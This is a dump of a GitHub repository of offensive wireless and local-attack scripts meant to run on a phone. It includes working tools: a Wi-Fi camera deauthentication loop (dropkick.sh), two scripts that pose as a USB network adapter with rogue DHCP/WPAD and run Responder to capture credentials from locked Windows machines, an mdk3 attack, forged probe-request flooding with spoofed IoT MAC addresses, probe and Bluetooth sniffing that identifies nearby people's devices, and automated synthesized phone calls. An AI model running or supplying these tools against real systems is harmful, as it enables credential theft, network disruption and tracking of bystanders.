├── README.md ├── autox.sh ├── callsomeonesaysomething.sh ├── dropkick.sh ├── eddystonebeacon.sh ├── evildomains_dayof.pdf ├── find_bt_hciname.sh ├── house_hide.py ├── linklocal-mubix-lock.sh ├── mdkdowngradetest.sh ├── mubix-lock.sh ├── nmapme.sh └── quickprobegrab.sh /README.md: -------------------------------------------------------------------------------- 1 | # GatosGuardianes # 2 | ### Scripts to automate certain tasks that may be a pain to execute w/ an "on screen" keyboard: 3 | 4 | evildomains_dayof.pdf - Slides from "We're All Scriptkiddies: Evil Domains/Gatos Guardianes" 5 | 6 | ### Bluetooth 7 | eddystonebeacon.sh - generate eddystone URL beacon (wip) 8 | 9 | find_bt_hciname.sh - check for bluetooth addy (mac+1) via wifi mac 10 | 11 | ### Local exploit 12 | mubix-lock.sh / linklocal-mubix-lock.sh = variations on sniffing locked winboxen 13 | 14 | ### Wireless 15 | autox.sh - sniff for probes, then try to cross reference 'em for bluetooth names 16 | 17 | quickprobegrab.sh - quick pcap grab of probes in an area for later dissecting/ID 18 | 19 | mdk3me.sh - spew out wifi-ssids (from test file) 20 | 21 | karmacheck.py - spew out random wifi probes 22 | 23 | mdkdowngradetest.sh - test downgrades on wifi 24 | 25 | nmapme.sh - nmap -sP local network 26 | 27 | house_hide.py - Spew out random probes from fake IoT devices 28 | 29 | paper-- - scripts to detect HP printers w/ wireless direct on, and do stuff 30 | 31 | ### Video 32 | dropkick.sh - Detect and deauth wireless cameras 33 | 34 | ### Voice 35 | callsomeonesaysomething.sh - Call someone, spew voice-synth message 36 | 37 | ringmybell.sh - Call a phone # over and over 38 | 39 | asterisk minimal install - Minimal install that'll work on nethunter N5 40 | 41 | - required for "callsomeonesaysomething", others. 42 | 43 | -------------------------------------------------------------------------------- /autox.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # autox 3 | # .. sniff for X seconds for probes, use that list to 4 | # inquire device names via bluetoofs. 5 | # - des 6 | 7 | DATE=`date +%Y%m%d-%H%M%S` 8 | FILE="captures/$DATE.pcap" 9 | OUTPUTFILE="captures/$DATE_probe_req_beacons.txt" 10 | BTOUTPUTFILE="captures/$DATE_bluetooth_hcifo.txt" 11 | INT="wlan1" 12 | MONINT="wlan1mon" 13 | BLUEINT="hci0" 14 | 15 | TIMEINSECONDS=$1 16 | 17 | INTCHECK=`ifconfig $INT | grep $INT` 18 | 19 | if [ -z "$INTCHECK" ]; then 20 | echo " " 21 | echo "AutoX says: I need an external wifi interface. Brah." 22 | exit 0 23 | fi 24 | 25 | echo "-----------------------------" 26 | echo " .. autox" 27 | echo "-----------------------------" 28 | echo 29 | echo "Sniff for probe reqs for X seconds," 30 | echo then try to figure out bluetooth interface 31 | echo and get device name. 32 | echo 33 | 34 | if [[ $# -eq 0 ]] ; then 35 | TIMEINSECONDS="30" 36 | echo " " 37 | echo "$0 -- usage: $0 TimeToRunInSeconds" 38 | echo "AutoX says: ... defaulting to $TIMEINSECONDS seconds, brah." 39 | echo "" 40 | fi 41 | 42 | echo "-----------------------------" 43 | echo Starting up monitor on $INT 44 | echo "-----------------------------" 45 | ifconfig $INT 46 | airmon-ng start $INT 47 | echo "-----------------------------" 48 | echo Capturing for $TIMEINSECONDS seconds to $FILE ... 49 | echo "-----------------------------" 50 | echo 51 | tcpdump -G $TIMEINSECONDS -W 1 -l -e -i $MONINT -s 256 -w $FILE \ 52 | type mgt subtype probe-req 53 | 54 | echo "-----------------------------" 55 | echo Cleaning up $MONINT.. 56 | echo "-----------------------------" 57 | echo 58 | airmon-ng stop $MONINT 59 | echo "-----------------------------" 60 | echo "Cleaning up list collected." 61 | echo "-----------------------------" 62 | echo 63 | tshark -r $FILE -Y 'wlan.fc.type_subtype eq 8 or wlan.fc.type_subtype eq 4 or wlan.fc.type_subtype eq 5' \ 64 | -T fields -e wlan.fc -e wlan.sa_resolved -e wlan.sa -e wlan.da_resolved -e wlan.da -e wlan_mgt.ssid \ 65 | | sort | uniq -c | sort -k 1 -n -r > $OUTPUTFILE 66 | echo 67 | echo "-----------------------------" 68 | echo "Checking for bluetooth names..." 69 | echo "-----------------------------" 70 | echo 71 | if [ -n $`hcitool dev | awk {'print $1'} | grep -i hci` ]; then echo "Remove the WIFI interface and plug in a bluetooth int."; fi 72 | until [ `hcitool dev | awk {'print $1'} | grep -i hci` ]; do sleep 1; done 73 | echo " " 74 | echo "Sweet, I have a bluetooth interface!" 75 | echo "Checking for Bluetooth interfaces/names..." 76 | 77 | for DEVICE in `cat $OUTPUTFILE | awk {'print $4'} | sort | uniq`; do 78 | ./find_bt_hciname.sh $DEVICE $BLUEINT >> $BTOUTPUTFILE 79 | done 80 | -------------------------------------------------------------------------------- /callsomeonesaysomething.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Call someone, SAY SOMETHING. 4 | # - david.e.switzer@gmail.com - mar 10 2017 5 | # requires: asterisk festival flite 6 | # 7 | 8 | # DEFAULT STUFFS 9 | ASTERISKSOUNDS="/var/lib/asterisk/sounds/en" 10 | ASTERISKCALLS="/var/spool/asterisk/outgoing" 11 | IFS=$'\n'; DATE=$(date +%Y%m%d_%H%m%S) 12 | YESTERDAY=$(date --date yesterday +%Y%m%d) 13 | PHONE=$1; TRUNK=$2; MESSAGE=$3 14 | NONE='\033[00m'; WHITE='\033[01;37m'; BOLD='\033[1m'; UNDERLINE='\033[4m' 15 | 16 | if [[ $# -eq 0 ]] ; then 17 | echo -e "=========================================================================" 18 | echo -e "${BOLD}${WHITE}$0${NONE} - d.switzer" 19 | echo -e "=========================================================================" 20 | echo -e "" 21 | echo -e " usage:" 22 | echo -e " $0 phone# trunkname words_in_quotes_if_more_than_one"; echo -e "" 23 | echo -e " ex: $0 18136660666 TESTtrunk \"This is a test\"" 24 | exit 0 25 | fi 26 | 27 | if [ ! -f `which text2wave` ]; then 28 | echo "missing: text2wav -- needed to create audio files - install festival and flite via apt-get"; exit 1 29 | fi 30 | 31 | if [ -f $ASTERISKSOUNDS/$YESTERDAY* ]; then 32 | echo -e "======================================" 33 | echo -e ${BOLD}${WHITE}Cleaning up sounds from yesterday...${NONE} 34 | rm $ASTERISKSOUNDS/$YESTERDAY* 35 | fi 36 | 37 | echo -e ================== 38 | echo -e ${BOLD}${WHITE}Creating audio..${NONE} 39 | echo -e ================== 40 | echo "$3" | text2wave > $ASTERISKSOUNDS/$DATE.wav 41 | lame -b 32 --resample 8 -a $ASTERISKSOUNDS/$DATE.wav $ASTERISKSOUNDS/$DATE.mp3 42 | chown asterisk.asterisk $ASTERISKSOUNDS/* 43 | 44 | echo -e ====================== 45 | echo -e ${BOLD}${WHITE}Creating call file..${NONE} 46 | echo -e ====================== 47 | echo "Channel: SIP/$TRUNK/$PHONE" > /tmp/$DATE.call 48 | echo "Application: Playback" >> /tmp/$DATE.call 49 | echo "Data: $ASTERISKSOUNDS/$DATE" >> /tmp/$DATE.call 50 | 51 | echo -e ====================== 52 | echo -e ${BOLD}${WHITE}Sending to ASTERISK..${NONE} 53 | echo -e ====================== 54 | mv /tmp/$DATE.call $ASTERISKCALLS/ 55 | 56 | -------------------------------------------------------------------------------- /dropkick.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # DROPKICK.SH 4 | # 5 | # Detect and Disconnect the DropCam and Withings devices some people are using to 6 | # spy on guests in their home, especially in AirBnB rentals. Based on Glasshole.sh: 7 | # 8 | # http://julianoliver.com/output/log_2014-05-30_20-52 9 | # 10 | # This script was named by Adam Harvey (http://ahprojects.com), who also 11 | # encouraged me to write it. It requires a GNU/Linux host (laptop, Raspberry Pi, 12 | # etc) and the aircrack-ng suite. I put 'beep' in there for a little audio 13 | # notification. Comment it out if you don't need it. 14 | # 15 | # See also http://plugunplug.net, for a plug-and-play device that does this 16 | # based on OpenWrt. Code here: 17 | # 18 | # https://github.com/JulianOliver/CyborgUnplug 19 | # 20 | # Save as dropkick.sh, 'chmod +x dropkick.sh' and exec as follows: 21 | # 22 | # sudo ./dropkick.sh 23 | 24 | # 25 | ## - modified by des twitter.com/violentlydave 26 | ## - added axis, nest camera 27 | 28 | shopt -s nocasematch # Set shell to ignore case 29 | shopt -s extglob # For non-interactive shell. 30 | 31 | readonly NIC=$1 # Your wireless NIC 32 | readonly BSSID=$2 # Network BSSID (AirBnB WiFi network) 33 | readonly MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }') 34 | # MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not 35 | # present. 36 | # nest labs = 18B430 37 | # dropcam = 308CFB 38 | # withings = 0024E4 39 | # axis communications = ACCC8E 00408C 40 | 41 | readonly GGMAC='@(30:8C:FB*|00:24:E4*)' # Match against DropCam and Withings 42 | readonly POLL=30 # Check every 30 seconds 43 | readonly LOG=/var/log/dropkick.log 44 | 45 | airmon-ng stop mon0 # Pull down any lingering monitor devices 46 | airmon-ng start $NIC # Start a monitor device 47 | 48 | while true; 49 | do 50 | for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \ 51 | '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}') 52 | do 53 | if [[ "$TARGET" == "$GGMAC" ]] 54 | then 55 | # Audio alert 56 | beep -f 1000 -l 500 -n 200 -r 2 57 | echo "WiFi camera discovered: "$TARGET >> $LOG 58 | aireplay-ng -0 1 -a $BSSID -c $TARGET mon0 59 | echo "De-authed: "$TARGET " from network: " $BSSID >> $LOG 60 | echo ' 61 | __ __ _ __ __ 62 | ___/ /______ ___ / /__ (_)___/ /_____ ___/ / 63 | / _ / __/ _ \/ _ \/ _// / __/ _/ -_) _ / 64 | \_,_/_/ \___/ .__/_/\_\/_/\__/_/\_\\__/\_,_/ 65 | /_/ 66 | 67 | ' 68 | else 69 | echo $TARGET": is not a DropCam or Withings device. Leaving alone.." 70 | fi 71 | done 72 | echo "None found this round." 73 | sleep $POLL 74 | done 75 | airmon-ng stop mon0 76 | -------------------------------------------------------------------------------- /eddystonebeacon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # - advertise out eddystone beacon 4 | # 5 | # https://github.com/google/eddystone/tree/master/eddystone-url 6 | #sudo hcitool -i hci0 cmd 0x08 0x0008 17 02 01 06 03 03 aa fe 0f 16 aa fe 10 00 03 77 65 62 67 61 7a 65 72 08 00 00 00 00 00 00 00 00 7 | # XX [webgazerINhex ] [08=.org] 8 | # AA= URL scheme, 9 | # 00 = http://www., 01 = https://www., 02 = http://, 03 = https:// 10 | # BB = addy in hex 11 | # CC = url encode 12 | # 00=.com/, 01=.org/, 02=.edu/, 03=.net/, 04=.info/, 05=.biz/, 06=.gov/, 13 | # 07=.com, 08=.org, 09=.edu, 10=.net, 11=.info, 12=.biz, 13=.gov, 14 | # 15 | # 16 | 17 | INT="hci0" 18 | 19 | # Bring the interface up 20 | sudo hcitool $INT up 21 | 22 | # Set bluetooth dev to "advertise /non-connectable" 23 | sudo hciconfig $INT leadv 3 24 | 25 | # Get yo beacon on! 26 | # -> add code to sort out https/domain automatically 27 | 28 | HOST="webgazer" 29 | DOM=".org" 30 | ENCODEDHOST=`echo $HOST | od -t x1 |grep 0000000 | sed "s/0000000 //g"` 31 | 32 | #sudo hcitool -i hci0 cmd 0x08 0x0008 17 02 01 06 03 03 aa fe 0f 16 aa fe 10 00 03 77 65 62 67 61 7a 65 72 08 00 00 00 00 00 00 00 00 33 | sudo hcitool -i $INT cmd 0x08 0x0008 17 02 01 06 03 03 aa fe 0f 16 aa fe 10 00 03 $ENCODEDHOST 08 00 00 00 00 00 00 00 00 34 | 35 | 36 | 37 | 38 | 39 | 40 | -------------------------------------------------------------------------------- /evildomains_dayof.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/violentlydave/GatosGuardianes/d6070d779a937d1fd7b52de1142e5dcdd8dc1a6b/evildomains_dayof.pdf -------------------------------------------------------------------------------- /find_bt_hciname.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # http://github.com/violentlydave 4 | # 5 | # ZGF2aWQgRE9UIGUgRE9UIHN3aXR6ZXIgYVQgICBHRWVlZU1BSUx6IERBV1QgQ09NCg== 6 | # 7 | # real: l2ping -c 1 60:BE:B5:83:EE:1F 8 | # l2ping -c 1 60:BE:B5:83:EE:1A; echo $? 9 | # take last octet, add one (hex), try pinging 10 | # if ping works, that = bluetooth 11 | # 12 | # 13 | 14 | # Comment out if you want quiet, uncomment for noise. 15 | VERBOSE="1" 16 | 17 | function log () { 18 | if [ ! -z $VERBOSE ]; then 19 | echo "$@" 20 | fi 21 | } 22 | 23 | if [[ $# -eq 0 ]] ; then 24 | echo "" 25 | echo " $0 - script to find bluetooth MAC addy via off-by-one" 26 | echo "" 27 | echo " usage:" 28 | echo " $0 WIFIMACADDRESS [optional HCI dev name, ex: hci1]" 29 | echo "" 30 | exit 1 31 | fi 32 | 33 | HCIDEV=$2 34 | if [ "$2" == "" ]; then HCIDEV="hci0"; fi 35 | 36 | 37 | # did ya know BC hates HEX w/ lowercase?.. yeah I didn't either. 38 | BLUETOOTHMAC=`echo $1 | tr '[:lower:]' '[:upper:]'` 39 | 40 | # because math. sloppy, sloppy math. 41 | FIRSTFIVE=`echo $BLUETOOTHMAC | cut -d \: -f 1,2,3,4,5` 42 | LAST=`echo $BLUETOOTHMAC | cut -d \: -f 6` 43 | LASTDEC=`echo "ibase=16; $LAST" | bc` 44 | DECPLUSONE=`expr $LASTDEC + 1` 45 | DECMINUSONE=`expr $LASTDEC - 1` 46 | HEXPLUSONE=`echo "obase=16; $DECPLUSONE" | bc` 47 | HEXMINUSONE=`echo "obase=16; $DECMINUSONE" | bc` 48 | 49 | TRIALMAC=$FIRSTFIVE":"$HEXPLUSONE 50 | 51 | echo $BLUETOOTHMAC : $HEXPLUSONE 52 | hcitool -i $HCIDEV name $TRIALMAC 53 | 54 | TRIALMAC=$FIRSTFIVE":"$HEXMINUSONE 55 | echo $BLUETOOTHMAC : $HEXMINUSONE 56 | hcitool -i $HCIDEV name $TRIALMAC 57 | -------------------------------------------------------------------------------- /house_hide.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # house_hide.py - d.e.switzer 4 | # 5 | # spew out fake wifi probes from IoT devices, cloud the area 6 | # 7 | # MACS USED / Source / Basic info: 8 | ## Thermostats 9 | # 64:16:66:XX:XX:XX # Nest 10 | # 18:B4:30:XX:XX:XX # Nest 11 | # 44:61:32:XX:XX:XX # Ecobee 12 | # 13 | ## Helpers 14 | # 74:C2:46:XX:XX:XX # Amazon 15 | # 68:54:FD:XX:XX:XX # Amazon Echo 16 | # F4:F5:D8:XX:XX:XX # Google Home? (Check J.E.) 17 | # 18 | ## TV stuffs 19 | # 00:04:4B:XX:XX:XX # Nvidia Shield 20 | # B8:A1:75:XX:XX:XX # Roku 21 | # 22 | ## Power Control 23 | # 60:01:94:XX:XX:XX # Cheapo powerplugs 24 | # A0:20:A6:XX:XX:XX # Cheapo Powerplugs 25 | # 5C:CF:7F:XX:XX:XX # Cheapo Powerplugs 26 | # 50:C7:BF:XX:XX:XX # TPlink POwer Plugs 27 | # 28 | ## Misc Control 29 | # 00:17:88:XX:XX:XX # Phillips Hue Bridge 30 | # B0:72:BF:XX:XX:XX # Wink 31 | 32 | import random 33 | macs = ['Nest#64:16:66', 'Nest#18:B4:30', 'Ecobee#44:61:32', 'Amazon Device#74:C2:46', 'Amazon Echo#68:54:FD', 'NVidia Shield#00:04:4B', 'Roku#B8:A1:75', 'Cheapo Powerplug#60:01:94', 'Cheapo Powerplug#A0:20:a6', 'Cheapo Powerplug#5C:CF:7F', 'TPLink Power Plug#50:C7:BF', 'Wink#B0:72:BF'] 34 | random.shuffle(macs) 35 | 36 | import argparse,string, logging 37 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 38 | from scapy.all import * 39 | from random import randint 40 | from time import sleep 41 | 42 | __author__ = 'd.e.switzer' 43 | 44 | def get_me_some_args(): 45 | parser = argparse.ArgumentParser( 46 | description='Script sends out randomized 802.11 probe requests.') 47 | parser.add_argument( 48 | '-i', '--interface', type=str, help='Wifi interface', required=True) 49 | parser.add_argument( 50 | '-m', '--moninterface', type=str, help='Wifi monitor interface', required=False, default='mon0') 51 | parser.add_argument( 52 | '-c', '--channel', type=str, help='Channel #', required=False, default='11') 53 | parser.add_argument( 54 | '-s', '--ssid', type=str, help='SSID to broadcast probes for', required=False, default='Linksys') 55 | args = parser.parse_args() 56 | interface = args.interface 57 | moninterface = args.moninterface 58 | channel = args.channel 59 | SSID = args.ssid 60 | return interface,moninterface,channel,SSID 61 | 62 | interface,moninterface,channel,SSID = get_me_some_args() 63 | 64 | conf.iface = interface 65 | int = interface 66 | hw = interface 67 | monint = moninterface 68 | mac = '' 69 | 70 | def randomssid(length): 71 | return ''.join(random.choice(string.lowercase) for i in range(length)) 72 | 73 | class Scapy80211(): 74 | def __init__(self,intf=int,ssid=SSID,source=mac,bssid='ff:ff:ff:ff:ff:ff'): 75 | self.rates = "\x03\x12\x96\x18\x24\x30\x48\x60" 76 | self.ssid = ssid 77 | self.source = source 78 | self.bssid = bssid 79 | self.intf = intf 80 | self.intfmon = 'mon0' 81 | conf.iface = self.intfmon 82 | 83 | # create monitor interface using iw 84 | cmd = '/sbin/iw dev %s interface add %s type monitor >/dev/null 2>&1' \ 85 | % (self.intf, self.intfmon) 86 | cmdintup = '/sbin/ifconfig %s up > /dev/null 2>&1' % (self.intfmon) 87 | try: 88 | os.system(cmd) 89 | os.system(cmdintup) 90 | except: 91 | raise 92 | 93 | def ProbeReq(self,count=1,ssid=SSID,dst='ff:ff:ff:ff:ff:ff'): 94 | if not ssid: ssid=self.ssid 95 | param = Dot11ProbeReq() 96 | essid = Dot11Elt(ID='SSID',info=ssid) 97 | rate1 = "\x02\x04\x0b\x16" 98 | rate2 = "\x82\x84\x0b\x16\x24\x30\x48\x6c" 99 | rate3 = "\x03\x12\x96\x18\x24\x30\x48\x60" 100 | rate4 = "\x82\x84\x8b\x96\x12\x24\x48\x6c" 101 | rates = Dot11Elt(ID='Rates',info=rate4) 102 | dsset = Dot11Elt(ID='DSset',info=chr(1)) 103 | erpinfo = Dot11Elt(ID='ERPinfo',info='\x00') 104 | esrates = Dot11Elt(ID='ESRates',info='\x0c\x18\x30\x60') 105 | tim = Dot11Elt(ID='TIM',info='\x00\x01\x00\x00') 106 | 107 | # Vendor specific extras. Modeled after a Realtek device. Add 108 | # "/vendor" to the "pkt" definition below if you'd like to use them. 109 | # 110 | # These values are easy to find in WireShark under the "tagged options" for 111 | # a wireless packet, and the variables below are named to be close or identical 112 | # to how they are named in WireShark. 113 | # 114 | uuidr = "\x10\x48\x00\x10\x52\x61\x6c\x69\x6e\x6b\x57\x50\x53\x2d\xac\x81\x12\xa1\xa3\x74" 115 | primarydevtype = "\x10\x54\x00\x08\x00\x01\x00\x50\xf2\x04\x00\x01" 116 | rfbands = "\x10\x3c\x00\x01\x01" 117 | assocstate = "\x10\x02\x00\x02\x00\x00" 118 | configerror = "\x10\x09\x00\x02\x00\x00" 119 | devicepassid = "\x10\x12\x00\x02\x00\x00" 120 | devicename = "\x10\x11\x00\x0d\x52\x61\x6c\x69\x6e\x6b\x20\x43\x6c\x69\x65\x6e\x74" 121 | manufacturer = "\x10\x21\x00\x18\x52\x61\x6c\x69\x6e\x6b\x20\x54\x65\x63\x68\x6e\x6f\x6c\x6f\x67\x79\x2c\x20\x43\x6f\x72\x70\x2e" 122 | modelname = "\x10\x23\x00\x17\x52\x62\x6c\x6e\x6b\x20\x57\x69\x72\x65\x6c\x65\x73\x73\x20\x41\x64\x61\x70\x74\x65\x72\x10" 123 | modelnum = "\x10\x24\x00\x06\x52\x54\x32\x38\x30\x30" 124 | vendorextension = "\x10\x49\x00\x06\x00\x37\x2a\x00\x01\x20" 125 | hdcap = "\x2d\x1a\x6e\x01\x02\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 126 | hdcap2 = "\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00" 127 | extendedcap = "\x7f\x01\x01" 128 | vendor = Dot11Elt(ID=221,len=167,info="\x00\x50\xf2\x04\x10\x4a" + 129 | "\x00\x01\x10\x10" + "\x3a\x00" + "\x01\x00\x10\x08" + "\x00\x02" + "\x22\x8c" + 130 | uuidr + primarydevtype + rfbands + assocstate + configerror + devicepassid + devicename + 131 | manufacturer + modelname + modelnum + vendorextension +hdcap + hdcap2 + extendedcap) 132 | 133 | pkt = RadioTap()\ 134 | /Dot11(type=0,subtype=4,addr1=dst,addr2=self.source,addr3=self.bssid)\ 135 | /param/essid/rates/esrates/tim 136 | 137 | print 'ProbeReq: SSID=[%s]|src=[%s]|count=%d' % (ssid,self.source,count) 138 | try: 139 | sendp(pkt,count=count,inter=0.1,verbose=0) 140 | except: 141 | raise 142 | 143 | print "-------------------------------------------------" 144 | print " House Hide - send out fake home IoT probes" 145 | print "-------------------------------------------------" 146 | print " .. hit control-C to stop the madness" 147 | print "-------------------------------------------------" 148 | print "Sending probe requests via " + hw + "..." 149 | print "-------------------------------------------------" 150 | 151 | while True: 152 | for toy in macs: 153 | data = toy.split("#") 154 | devicename = data[0] 155 | mac = data[1] 156 | yay = ":" 157 | lastpart = "%02x:%02x:%02x" % (random.randint(0, 255),random.randint(0, 255),random.randint(0, 255),) 158 | seq = (mac, lastpart) 159 | testmac = yay.join ( seq ) 160 | # SSID = randomssid(32) 161 | print "I'm a",devicename 162 | sdot11 = Scapy80211(intf=int,source=testmac,ssid=SSID) 163 | packet = sdot11.ProbeReq() 164 | sleepy=randint(1,4) 165 | print ".. sleeping", sleepy 166 | print " " 167 | sleep(sleepy) 168 | 169 | -------------------------------------------------------------------------------- /linklocal-mubix-lock.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # TODO: Add checks for packages 4 | # 5 | # apt-get install -y python git python-pip python-dev screen sqlite3 6 | # pip install pycrypto 7 | # cd /root 8 | # git clone https://github.com/spiderlabs/responder 9 | # 10 | 11 | # 12 | # TODO: Add check for RNDIS interface 13 | # 14 | echo "Bringing down USB" 15 | # We have to disable the usb interface before reconfiguring it 16 | echo 0 > /sys/devices/virtual/android_usb/android0/enable 17 | echo rndis > /sys/devices/virtual/android_usb/android0/functions 18 | echo 224 > /sys/devices/virtual/android_usb/android0/bDeviceClass 19 | echo 6863 > /sys/devices/virtual/android_usb/android0/idProduct 20 | echo 1 > /sys/devices/virtual/android_usb/android0/enable 21 | 22 | echo "Check for changes" 23 | # Check whether it has applied the changes 24 | cat /sys/devices/virtual/android_usb/android0/functions 25 | cat /sys/devices/virtual/android_usb/android0/enable 26 | 27 | echo "rndis0 interface:" 28 | ifconfig rndis0 29 | 30 | echo "Setting IP for rndis0" 31 | ip addr flush dev rndis0 32 | # - Use linklocal/26, so if target comes up in a weird state 33 | # and attempts linklocal.. we can talk back ;) 34 | #ip addr add 10.0.0.201/24 dev rndis0 35 | ip addr add 169.254.1.201/16 dev rndis0 36 | ip link set rndis0 up 37 | 38 | echo "Creating DHCP.conf" 39 | cat << EOF > /root/mubix-dhcpd.conf 40 | 41 | option domain-name "domain.local"; 42 | option domain-name-servers 169.254.1.201; 43 | 44 | # If this DHCP server is the official DHCP server for the local 45 | # network, the authoritative directive should be uncommented. 46 | authoritative; 47 | 48 | # Use this to send dhcp log messages to a different log file (you also 49 | # have to hack syslog.conf to complete the redirection). 50 | log-facility local7; 51 | 52 | # wpad 53 | option local-proxy-config code 252 = text; 54 | 55 | # A slightly different configuration for an internal subnet. 56 | subnet 169.254.0.0 netmask 255.255.0.0 { 57 | range 169.254.10.0 169.254.10.100; 58 | option routers 169.254.1.201; 59 | option local-proxy-config "http://169.254.1.201/wpad.dat"; 60 | } 61 | EOF 62 | 63 | echo "Remove previous dhcpd leases" 64 | rm -f /var/lib/dhcp/dhcpd.leases 65 | touch /var/lib/dhcp/dhcpd.leases 66 | 67 | echo "Starting DHCPD server" 68 | /usr/sbin/dhcpd -cf /root/mubix-dhcpd.conf 69 | 70 | echo "Creating SCREEN logger" 71 | cat << EOF > /root/.screenrc 72 | # Logging 73 | deflog on 74 | logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log 75 | EOF 76 | mkdir -p /root/logs 77 | 78 | echo "Starting Responder" 79 | /usr/bin/screen -dmS responder bash -c 'cd /root/Responder/; python Responder.py -I rndis0 -v -f -w -r -d -F' 80 | 81 | # TODO: Kill Responder, bring rndis0 down 82 | killall dhcpd 83 | 84 | -------------------------------------------------------------------------------- /mdkdowngradetest.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | airmon-ng start wlan1 3 | mdk3 wlan1mon g 4 | -------------------------------------------------------------------------------- /mubix-lock.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # TODO: Add checks for packages 4 | # 5 | # apt-get install -y python git python-pip python-dev screen sqlite3 6 | # pip install pycrypto 7 | # cd /root 8 | # git clone https://github.com/spiderlabs/responder 9 | # 10 | 11 | # 12 | # TODO: Add check for RNDIS interface 13 | # 14 | echo "Bringing down USB" 15 | # We have to disable the usb interface before reconfiguring it 16 | echo 0 > /sys/devices/virtual/android_usb/android0/enable 17 | echo rndis > /sys/devices/virtual/android_usb/android0/functions 18 | echo 224 > /sys/devices/virtual/android_usb/android0/bDeviceClass 19 | echo 6863 > /sys/devices/virtual/android_usb/android0/idProduct 20 | echo 1 > /sys/devices/virtual/android_usb/android0/enable 21 | 22 | echo "Check for changes" 23 | # Check whether it has applied the changes 24 | cat /sys/devices/virtual/android_usb/android0/functions 25 | cat /sys/devices/virtual/android_usb/android0/enable 26 | 27 | echo "rndis0 interface:" 28 | ifconfig rndis0 29 | 30 | echo "Setting IP for rndis0" 31 | ip addr flush dev rndis0 32 | ip addr add 10.0.0.201/24 dev rndis0 33 | ip link set rndis0 up 34 | 35 | echo "Creating DHCP.conf" 36 | cat << EOF > /root/mubix-dhcpd.conf 37 | 38 | option domain-name "domain.local"; 39 | option domain-name-servers 10.0.0.201; 40 | 41 | # If this DHCP server is the official DHCP server for the local 42 | # network, the authoritative directive should be uncommented. 43 | authoritative; 44 | 45 | # Use this to send dhcp log messages to a different log file (you also 46 | # have to hack syslog.conf to complete the redirection). 47 | log-facility local7; 48 | 49 | # wpad 50 | option local-proxy-config code 252 = text; 51 | 52 | # A slightly different configuration for an internal subnet. 53 | subnet 10.0.0.0 netmask 255.255.255.0 { 54 | range 10.0.0.1 10.0.0.2; 55 | option routers 10.0.0.201; 56 | option local-proxy-config "http://10.0.0.201/wpad.dat"; 57 | } 58 | EOF 59 | 60 | echo "Remove previous dhcpd leases" 61 | rm -f /var/lib/dhcp/dhcpd.leases 62 | touch /var/lib/dhcp/dhcpd.leases 63 | 64 | echo "Starting DHCPD server" 65 | /usr/sbin/dhcpd -cf /root/mubix-dhcpd.conf 66 | 67 | echo "Creating SCREEN logger" 68 | cat << EOF > /root/.screenrc 69 | # Logging 70 | deflog on 71 | logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log 72 | EOF 73 | mkdir -p /root/logs 74 | 75 | echo "Starting Responder" 76 | /usr/bin/screen -dmS responder bash -c 'cd /root/Responder/; python Responder.py -I rndis0 -f -w -r -d -F' 77 | 78 | # TODO: Kill Responder, bring rndis0 down 79 | -------------------------------------------------------------------------------- /nmapme.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # - nmapme.sh - github.com/violentlydave 3 | # ---- nmap -sP local net 4 | 5 | INT=$1 6 | 7 | if [[ $# -eq 0 ]] ; then 8 | echo "" 9 | echo " $0 - script to ping sweep local net." 10 | echo "" 11 | echo " usage:" 12 | echo " $0 wifi-interface-of-network-you-wanna-scan" 13 | echo "" 14 | echo " ... no interface given, defaulting to wlan0. /24" 15 | INT="wlan0" 16 | fi 17 | 18 | 19 | NETWORKTOSCAN=`ifconfig $INT | grep broadcast | awk {'print $6'} | sed "s/255/0\/24/g"` 20 | 21 | echo SCANNING $INT 22 | nmap -sP -n $NETWORKTOSCAN 23 | -------------------------------------------------------------------------------- /quickprobegrab.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | DATE=`date +%Y%m%d-%H%M%S` 3 | FILE="captures/$DATE.pcap" 4 | INT="wlan1" 5 | 6 | echo ----------------------------- 7 | echo Starting up monitor on $INT 8 | echo ----------------------------- 9 | ifconfig wlan1 10 | airmon-ng start wlan1 11 | echo ----------------------------- 12 | echo Capturing to $FILE ... 13 | echo ----------------------------- 14 | echo 15 | tcpdump -l -e -i wlan1mon -s 256 -w $FILE type mgt subtype probe-req 16 | echo ----------------------------- 17 | echo Cleaning up... 18 | echo ----------------------------- 19 | echo 20 | airmon-ng stop wlan1mon 21 | --------------------------------------------------------------------------------